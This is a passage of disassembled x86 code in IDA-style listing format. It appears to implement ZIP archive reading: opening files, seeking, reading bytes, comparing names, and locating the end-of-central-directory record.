arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_8], 1
jz short loc_40E321
cmp [ebp+arg_8], 2
jz short loc_40E321
cmp [ebp+arg_8], 3
jz short loc_40E321
mov eax, [ebp+arg_C]
mov dword ptr [eax], 10000h
xor eax, eax
jmp loc_40E487
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40E2F9+A�j
; sub_40E2F9+10�j ...
mov [ebp+var_8], 0
mov byte ptr [ebp+var_4], 0
mov ecx, [ebp+arg_C]
mov dword ptr [ecx], 0
cmp [ebp+arg_8], 1
jz short loc_40E345
cmp [ebp+arg_8], 2
jnz loc_40E3DC
loc_40E345: ; CODE XREF: sub_40E2F9+40�j
cmp [ebp+arg_8], 1
jnz short loc_40E38E
mov edx, [ebp+arg_0]
mov [ebp+var_18], edx
push 2
push 0
push 0
lea eax, [ebp+var_8]
push eax
call dword_413098 ; GetCurrentProcess
push eax
mov ecx, [ebp+var_18]
push ecx
call dword_413098 ; GetCurrentProcess
push eax
call dword_41309C ; DuplicateHandle
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40E38C
mov edx, [ebp+arg_C]
mov dword ptr [edx], 100h
xor eax, eax
jmp loc_40E487
; ---------------------------------------------------------------------------
loc_40E38C: ; CODE XREF: sub_40E2F9+81�j
jmp short loc_40E3C3
; ---------------------------------------------------------------------------
loc_40E38E: ; CODE XREF: sub_40E2F9+50�j
push 0
push 80h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call dword_413018 ; CreateFileA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_40E3C3
mov ecx, [ebp+arg_C]
mov dword ptr [ecx], 200h
xor eax, eax
jmp loc_40E487
; ---------------------------------------------------------------------------
loc_40E3C3: ; CODE XREF: sub_40E2F9:loc_40E38C�j
; sub_40E2F9+B8�j
mov edx, [ebp+var_8]
push edx
call dword_4130A0 ; GetFileType
mov [ebp+var_10], eax
xor eax, eax
cmp [ebp+var_10], 1
setz al
mov byte ptr [ebp+var_4], al
loc_40E3DC: ; CODE XREF: sub_40E2F9+46�j
push 1Ch
call sub_4114F4
add esp, 4
mov [ebp+var_1C], eax
mov ecx, [ebp+var_1C]
mov [ebp+var_C], ecx
cmp [ebp+arg_8], 1
jz short loc_40E3FB
cmp [ebp+arg_8], 2
jnz short loc_40E448
loc_40E3FB: ; CODE XREF: sub_40E2F9+FA�j
mov edx, [ebp+var_C]
mov byte ptr [edx], 1
mov eax, [ebp+var_C]
mov cl, byte ptr [ebp+var_4]
mov [eax+1], cl
mov edx, [ebp+var_C]
mov eax, [ebp+var_8]
mov [edx+4], eax
mov ecx, [ebp+var_C]
mov byte ptr [ecx+8], 0
mov edx, [ebp+var_C]
mov dword ptr [edx+0Ch], 0
mov eax, [ebp+var_4]
and eax, 0FFh
test eax, eax
jz short loc_40E446
push 1
push 0
push 0
mov ecx, [ebp+var_8]
push ecx
call dword_4130A4 ; SetFilePointer
mov edx, [ebp+var_C]
mov [edx+0Ch], eax
loc_40E446: ; CODE XREF: sub_40E2F9+135�j
jmp short loc_40E47B
; ---------------------------------------------------------------------------
loc_40E448: ; CODE XREF: sub_40E2F9+100�j
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
mov ecx, [ebp+var_C]
mov byte ptr [ecx+1], 1
mov edx, [ebp+var_C]
mov eax, [ebp+arg_0]
mov [edx+10h], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
mov [ecx+14h], edx
mov eax, [ebp+var_C]
mov dword ptr [eax+18h], 0
mov ecx, [ebp+var_C]
mov dword ptr [ecx+0Ch], 0
loc_40E47B: ; CODE XREF: sub_40E2F9:loc_40E446�j
mov edx, [ebp+arg_C]
mov dword ptr [edx], 0
mov eax, [ebp+var_C]
loc_40E487: ; CODE XREF: sub_40E2F9+23�j
; sub_40E2F9+8E�j ...
mov esp, ebp
pop ebp
retn
sub_40E2F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E48B proc near ; CODE XREF: sub_40EA92+28�p
; sub_40EA92+19D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_40E49A
or eax, 0FFFFFFFFh
jmp short loc_40E4C6
; ---------------------------------------------------------------------------
loc_40E49A: ; CODE XREF: sub_40E48B+8�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_40E4B2
mov edx, [ebp+arg_0]
mov eax, [edx+4]
push eax
call dword_413020 ; CloseHandle
loc_40E4B2: ; CODE XREF: sub_40E48B+18�j
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
call sub_4114EE
add esp, 4
xor eax, eax
loc_40E4C6: ; CODE XREF: sub_40E48B+D�j
mov esp, ebp
pop ebp
retn
sub_40E48B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E4CA proc near ; CODE XREF: sub_40E6BE+39�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_40E4EB
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx+8]
test eax, eax
jz short loc_40E4EB
mov eax, 1
jmp short loc_40E4ED
; ---------------------------------------------------------------------------
loc_40E4EB: ; CODE XREF: sub_40E4CA+C�j
; sub_40E4CA+18�j
xor eax, eax
loc_40E4ED: ; CODE XREF: sub_40E4CA+1F�j
pop ebp
retn
sub_40E4CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E4EF proc near ; CODE XREF: sub_40E901+25�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_40E524
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_40E524
push 1
push 0
push 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
push edx
call dword_4130A4 ; SetFilePointer
mov ecx, [ebp+arg_0]
sub eax, [ecx+0Ch]
jmp short loc_40E539
; ---------------------------------------------------------------------------
loc_40E524: ; CODE XREF: sub_40E4EF+C�j
; sub_40E4EF+18�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_40E533
xor eax, eax
jmp short loc_40E539
; ---------------------------------------------------------------------------
loc_40E533: ; CODE XREF: sub_40E4EF+3E�j
mov ecx, [ebp+arg_0]
mov eax, [ecx+18h]
loc_40E539: ; CODE XREF: sub_40E4EF+33�j
; sub_40E4EF+42�j
pop ebp
retn
sub_40E4EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E53B proc near ; CODE XREF: sub_40E901+E�p
; sub_40E901+D7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_40E5BD
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_40E5BD
cmp [ebp+arg_8], 0
jnz short loc_40E578
push 0
push 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
add edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call dword_4130A4 ; SetFilePointer
jmp short loc_40E5B9
; ---------------------------------------------------------------------------
loc_40E578: ; CODE XREF: sub_40E53B+1E�j
cmp [ebp+arg_8], 1
jnz short loc_40E595
push 1
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call dword_4130A4 ; SetFilePointer
jmp short loc_40E5B9
; ---------------------------------------------------------------------------
loc_40E595: ; CODE XREF: sub_40E53B+41�j
cmp [ebp+arg_8], 2
jnz short loc_40E5B2
push 2
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call dword_4130A4 ; SetFilePointer
jmp short loc_40E5B9
; ---------------------------------------------------------------------------
loc_40E5B2: ; CODE XREF: sub_40E53B+5E�j
mov eax, 13h
jmp short loc_40E60E
; ---------------------------------------------------------------------------
loc_40E5B9: ; CODE XREF: sub_40E53B+3B�j
; sub_40E53B+58�j ...
xor eax, eax
jmp short loc_40E60E
; ---------------------------------------------------------------------------
loc_40E5BD: ; CODE XREF: sub_40E53B+C�j
; sub_40E53B+18�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_40E5CF
mov eax, 1Dh
jmp short loc_40E60E
; ---------------------------------------------------------------------------
loc_40E5CF: ; CODE XREF: sub_40E53B+8B�j
cmp [ebp+arg_8], 0
jnz short loc_40E5E0
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
mov [ecx+18h], edx
jmp short loc_40E60C
; ---------------------------------------------------------------------------
loc_40E5E0: ; CODE XREF: sub_40E53B+98�j
cmp [ebp+arg_8], 1
jnz short loc_40E5F7
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
add ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [edx+18h], ecx
jmp short loc_40E60C
; ---------------------------------------------------------------------------
loc_40E5F7: ; CODE XREF: sub_40E53B+A9�j
cmp [ebp+arg_8], 2
jnz short loc_40E60C
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
add ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [edx+18h], ecx
loc_40E60C: ; CODE XREF: sub_40E53B+A3�j
; sub_40E53B+BA�j ...
xor eax, eax
loc_40E60E: ; CODE XREF: sub_40E53B+7C�j
; sub_40E53B+80�j ...
pop ebp
retn
sub_40E53B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E610 proc near ; CODE XREF: sub_40E6BE+12�p
; sub_40E901+F6�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_8]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_C]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_40E660
push 0
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_C]
mov ecx, [eax+4]
push ecx
call dword_41301C ; ReadFile
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40E656
mov edx, [ebp+arg_C]
mov byte ptr [edx+8], 1
loc_40E656: ; CODE XREF: sub_40E610+3D�j
mov eax, [ebp+var_10]
xor edx, edx
div [ebp+arg_4]
jmp short loc_40E6BA
; ---------------------------------------------------------------------------
loc_40E660: ; CODE XREF: sub_40E610+19�j
mov eax, [ebp+arg_C]
mov ecx, [eax+18h]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_C]
cmp ecx, [edx+14h]
jbe short loc_40E680
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_C]
mov edx, [eax+14h]
sub edx, [ecx+18h]
mov [ebp+var_8], edx
loc_40E680: ; CODE XREF: sub_40E610+5F�j
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_C]
mov edx, [ecx+10h]
mov eax, [ebp+arg_C]
add edx, [eax+18h]
push edx
mov ecx, [ebp+arg_0]
push ecx
call sub_411634 ; memcpy
add esp, 0Ch
mov edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+arg_C]
mov ecx, [eax+18h]
add ecx, [ebp+var_4]
mov edx, [ebp+arg_C]
mov [edx+18h], ecx
mov eax, [ebp+var_4]
xor edx, edx
div [ebp+arg_4]
loc_40E6BA: ; CODE XREF: sub_40E610+4E�j
mov esp, ebp
pop ebp
retn
sub_40E610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6BE proc near ; CODE XREF: sub_40E70E+E�p
; sub_40E70E+2D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
push eax
push 1
push 1
lea ecx, [ebp+var_8]
push ecx
call sub_40E610
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jnz short loc_40E6F3
mov edx, [ebp+var_8]
and edx, 0FFh
mov eax, [ebp+arg_4]
mov [eax], edx
xor eax, eax
jmp short loc_40E70A
; ---------------------------------------------------------------------------
loc_40E6F3: ; CODE XREF: sub_40E6BE+21�j
mov ecx, [ebp+arg_0]
push ecx
call sub_40E4CA
add esp, 4
test eax, eax
jz short loc_40E708
or eax, 0FFFFFFFFh
jmp short loc_40E70A
; ---------------------------------------------------------------------------
loc_40E708: ; CODE XREF: sub_40E6BE+43�j
xor eax, eax
loc_40E70A: ; CODE XREF: sub_40E6BE+33�j
; sub_40E6BE+48�j
mov esp, ebp
pop ebp
retn
sub_40E6BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E70E proc near ; CODE XREF: sub_40EA92+9A�p
; sub_40EA92+B5�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E6BE
add esp, 8
mov [ebp+var_4], eax
mov edx, [ebp+var_C]
mov [ebp+var_8], edx
cmp [ebp+var_4], 0
jnz short loc_40E746
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E6BE
add esp, 8
mov [ebp+var_4], eax
loc_40E746: ; CODE XREF: sub_40E70E+23�j
mov edx, [ebp+var_C]
shl edx, 8
mov eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jnz short loc_40E764
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx], edx
jmp short loc_40E76D
; ---------------------------------------------------------------------------
loc_40E764: ; CODE XREF: sub_40E70E+4A�j
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0
loc_40E76D: ; CODE XREF: sub_40E70E+54�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40E70E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E774 proc near ; CODE XREF: sub_40EA92+7F�p
; sub_40EA92+127�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E6BE
add esp, 8
mov [ebp+var_4], eax
mov edx, [ebp+var_C]
mov [ebp+var_8], edx
cmp [ebp+var_4], 0
jnz short loc_40E7AC
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E6BE
add esp, 8
mov [ebp+var_4], eax
loc_40E7AC: ; CODE XREF: sub_40E774+23�j
mov edx, [ebp+var_C]
shl edx, 8
mov eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jnz short loc_40E7D3
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_40E6BE
add esp, 8
mov [ebp+var_4], eax
loc_40E7D3: ; CODE XREF: sub_40E774+4A�j
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_8]
add ecx, eax
mov [ebp+var_8], ecx
cmp [ebp+var_4], 0
jnz short loc_40E7FA
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_40E6BE
add esp, 8
mov [ebp+var_4], eax
loc_40E7FA: ; CODE XREF: sub_40E774+71�j
mov ecx, [ebp+var_C]
shl ecx, 18h
mov edx, [ebp+var_8]
add edx, ecx
mov [ebp+var_8], edx
cmp [ebp+var_4], 0
jnz short loc_40E818
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_40E821
; ---------------------------------------------------------------------------
loc_40E818: ; CODE XREF: sub_40E774+98�j
mov edx, [ebp+arg_4]
mov dword ptr [edx], 0
loc_40E821: ; CODE XREF: sub_40E774+A2�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40E774 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E828 proc near ; CODE XREF: sub_40E8D4+23�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
loc_40E82E: ; CODE XREF: sub_40E828:loc_40E8CB�j
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_4], cl
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
mov cl, [eax]
mov [ebp+var_8], cl
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
movsx eax, [ebp+var_4]
cmp eax, 61h
jl short loc_40E86B
movsx ecx, [ebp+var_4]
cmp ecx, 7Ah
jg short loc_40E86B
mov dl, [ebp+var_4]
sub dl, 20h
mov [ebp+var_4], dl
loc_40E86B: ; CODE XREF: sub_40E828+2F�j
; sub_40E828+38�j
movsx eax, [ebp+var_8]
cmp eax, 61h
jl short loc_40E886
movsx ecx, [ebp+var_8]
cmp ecx, 7Ah
jg short loc_40E886
mov dl, [ebp+var_8]
sub dl, 20h
mov [ebp+var_8], dl
loc_40E886: ; CODE XREF: sub_40E828+4A�j
; sub_40E828+53�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_40E898
movsx eax, [ebp+var_8]
neg eax
sbb eax, eax
jmp short loc_40E8D0
; ---------------------------------------------------------------------------
loc_40E898: ; CODE XREF: sub_40E828+64�j
movsx ecx, [ebp+var_8]
test ecx, ecx
jnz short loc_40E8A7
mov eax, 1
jmp short loc_40E8D0
; ---------------------------------------------------------------------------
loc_40E8A7: ; CODE XREF: sub_40E828+76�j
movsx edx, [ebp+var_4]
movsx eax, [ebp+var_8]
cmp edx, eax
jge short loc_40E8B8
or eax, 0FFFFFFFFh
jmp short loc_40E8D0
; ---------------------------------------------------------------------------
loc_40E8B8: ; CODE XREF: sub_40E828+89�j
movsx ecx, [ebp+var_4]
movsx edx, [ebp+var_8]
cmp ecx, edx
jle short loc_40E8CB
mov eax, 1
jmp short loc_40E8D0
; ---------------------------------------------------------------------------
loc_40E8CB: ; CODE XREF: sub_40E828+9A�j
jmp loc_40E82E
; ---------------------------------------------------------------------------
loc_40E8D0: ; CODE XREF: sub_40E828+6E�j
; sub_40E828+7D�j ...
mov esp, ebp
pop ebp
retn
sub_40E828 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E8D4 proc near ; CODE XREF: sub_40F30A+D5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 1
jnz short loc_40E8EF
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_411684 ; strcmp
add esp, 8
jmp short loc_40E8FF
; ---------------------------------------------------------------------------
loc_40E8EF: ; CODE XREF: sub_40E8D4+7�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_40E828
add esp, 8
loc_40E8FF: ; CODE XREF: sub_40E8D4+19�j
pop ebp
retn
sub_40E8D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E901 proc near ; CODE XREF: sub_40EA92+42�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push 2
push 0
mov eax, [ebp+arg_0]
push eax
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40E922
xor eax, eax
jmp loc_40EA8E
; ---------------------------------------------------------------------------
loc_40E922: ; CODE XREF: sub_40E901+18�j
mov ecx, [ebp+arg_0]
push ecx
call sub_40E4EF
add esp, 4
mov [ebp+var_8], eax
mov [ebp+var_14], 0FFFFh
mov edx, [ebp+var_14]
cmp edx, [ebp+var_8]
jbe short loc_40E946
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
loc_40E946: ; CODE XREF: sub_40E901+3D�j
push 404h
call dword_4131C8 ; malloc
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40E964
xor eax, eax
jmp loc_40EA8E
; ---------------------------------------------------------------------------
loc_40E964: ; CODE XREF: sub_40E901+5A�j
mov [ebp+var_10], 0
mov [ebp+var_C], 4
loc_40E972: ; CODE XREF: sub_40E901:loc_40EA73�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_14]
jnb loc_40EA78
mov edx, [ebp+var_C]
add edx, 400h
cmp edx, [ebp+var_14]
jbe short loc_40E994
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
jmp short loc_40E9A0
; ---------------------------------------------------------------------------
loc_40E994: ; CODE XREF: sub_40E901+89�j
mov ecx, [ebp+var_C]
add ecx, 400h
mov [ebp+var_C], ecx
loc_40E9A0: ; CODE XREF: sub_40E901+91�j
mov edx, [ebp+var_8]
sub edx, [ebp+var_C]
mov [ebp+var_20], edx
mov eax, [ebp+var_8]
sub eax, [ebp+var_20]
cmp eax, 404h
jbe short loc_40E9BF
mov [ebp+var_24], 404h
jmp short loc_40E9C8
; ---------------------------------------------------------------------------
loc_40E9BF: ; CODE XREF: sub_40E901+B3�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
loc_40E9C8: ; CODE XREF: sub_40E901+BC�j
mov edx, [ebp+var_24]
mov [ebp+var_18], edx
push 0
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40E9E9
jmp loc_40EA78
; ---------------------------------------------------------------------------
loc_40E9E9: ; CODE XREF: sub_40E901+E1�j
mov edx, [ebp+arg_0]
push edx
push 1
mov eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_40E610
add esp, 10h
cmp eax, 1
jz short loc_40EA06
jmp short loc_40EA78
; ---------------------------------------------------------------------------
loc_40EA06: ; CODE XREF: sub_40E901+101�j
mov edx, [ebp+var_18]
sub edx, 3
mov [ebp+var_1C], edx
loc_40EA0F: ; CODE XREF: sub_40E901:loc_40EA69�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jle short loc_40EA6B
mov edx, [ebp+var_4]
add edx, [ebp+var_1C]
xor eax, eax
mov al, [edx]
cmp eax, 50h
jnz short loc_40EA69
mov ecx, [ebp+var_4]
add ecx, [ebp+var_1C]
xor edx, edx
mov dl, [ecx+1]
cmp edx, 4Bh
jnz short loc_40EA69
mov eax, [ebp+var_4]
add eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+2]
cmp ecx, 5
jnz short loc_40EA69
mov edx, [ebp+var_4]
add edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+3]
cmp eax, 6
jnz short loc_40EA69
mov ecx, [ebp+var_20]
add ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA69: ; CODE XREF: sub_40E901+12B�j
; sub_40E901+13B�j ...
jmp short loc_40EA0F
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E901+11C�j
; sub_40E901+166�j
cmp [ebp+var_10], 0
jz short loc_40EA73
jmp short loc_40EA78
; ---------------------------------------------------------------------------
loc_40EA73: ; CODE XREF: sub_40E901+16E�j
jmp loc_40E972
; ---------------------------------------------------------------------------
loc_40EA78: ; CODE XREF: sub_40E901+77�j
; sub_40E901+E3�j ...
cmp [ebp+var_4], 0
jz short loc_40EA8B
mov edx, [ebp+var_4]
push edx
call dword_4131D4 ; free
add esp, 4
loc_40EA8B: ; CODE XREF: sub_40E901+17B�j
mov eax, [ebp+var_10]
loc_40EA8E: ; CODE XREF: sub_40E901+1C�j
; sub_40E901+5E�j
mov esp, ebp
pop ebp
retn
sub_40E901 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EA92 proc near ; CODE XREF: sub_40FE9E+99�p
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_90 = dword ptr -90h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 9Ch
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_40EAAA
xor eax, eax
jmp loc_40ECA2
; ---------------------------------------------------------------------------
loc_40EAAA: ; CODE XREF: sub_40EA92+F�j
movsx eax, byte_414AA4
cmp eax, 20h
jz short loc_40EAC9
mov ecx, [ebp+arg_0]
push ecx
call sub_40E48B
add esp, 4
xor eax, eax
jmp loc_40ECA2
; ---------------------------------------------------------------------------
loc_40EAC9: ; CODE XREF: sub_40EA92+22�j
mov [ebp+var_8], 0
mov edx, [ebp+arg_0]
push edx
call sub_40E901
add esp, 4
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40EAEC
mov [ebp+var_8], 0FFFFFFFFh
loc_40EAEC: ; CODE XREF: sub_40EA92+51�j
push 0
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40EB09
mov [ebp+var_8], 0FFFFFFFFh
loc_40EB09: ; CODE XREF: sub_40EA92+6E�j
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EB24
mov [ebp+var_8], 0FFFFFFFFh
loc_40EB24: ; CODE XREF: sub_40EA92+89�j
lea ecx, [ebp+var_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EB3F
mov [ebp+var_8], 0FFFFFFFFh
loc_40EB3F: ; CODE XREF: sub_40EA92+A4�j
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EB5A
mov [ebp+var_8], 0FFFFFFFFh
loc_40EB5A: ; CODE XREF: sub_40EA92+BF�j
lea edx, [ebp+var_98]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EB78
mov [ebp+var_8], 0FFFFFFFFh
loc_40EB78: ; CODE XREF: sub_40EA92+DD�j
lea ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EB93
mov [ebp+var_8], 0FFFFFFFFh
loc_40EB93: ; CODE XREF: sub_40EA92+F8�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_98]
jnz short loc_40EBAA
cmp [ebp+var_18], 0
jnz short loc_40EBAA
cmp [ebp+var_4], 0
jz short loc_40EBB1
loc_40EBAA: ; CODE XREF: sub_40EA92+10A�j
; sub_40EA92+110�j
mov [ebp+var_8], 0FFFFFF99h
loc_40EBB1: ; CODE XREF: sub_40EA92+116�j
lea ecx, [ebp+var_7C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EBCC
mov [ebp+var_8], 0FFFFFFFFh
loc_40EBCC: ; CODE XREF: sub_40EA92+131�j
lea eax, [ebp+var_78]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EBE7
mov [ebp+var_8], 0FFFFFFFFh
loc_40EBE7: ; CODE XREF: sub_40EA92+14C�j
lea edx, [ebp+var_94]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EC05
mov [ebp+var_8], 0FFFFFFFFh
loc_40EC05: ; CODE XREF: sub_40EA92+16A�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
add edx, [ecx+0Ch]
mov eax, [ebp+var_78]
add eax, [ebp+var_7C]
cmp edx, eax
jnb short loc_40EC25
cmp [ebp+var_8], 0
jnz short loc_40EC25
mov [ebp+var_8], 0FFFFFF99h
loc_40EC25: ; CODE XREF: sub_40EA92+184�j
; sub_40EA92+18A�j
cmp [ebp+var_8], 0
jz short loc_40EC3B
mov ecx, [ebp+arg_0]
push ecx
call sub_40E48B
add esp, 4
xor eax, eax
jmp short loc_40ECA2
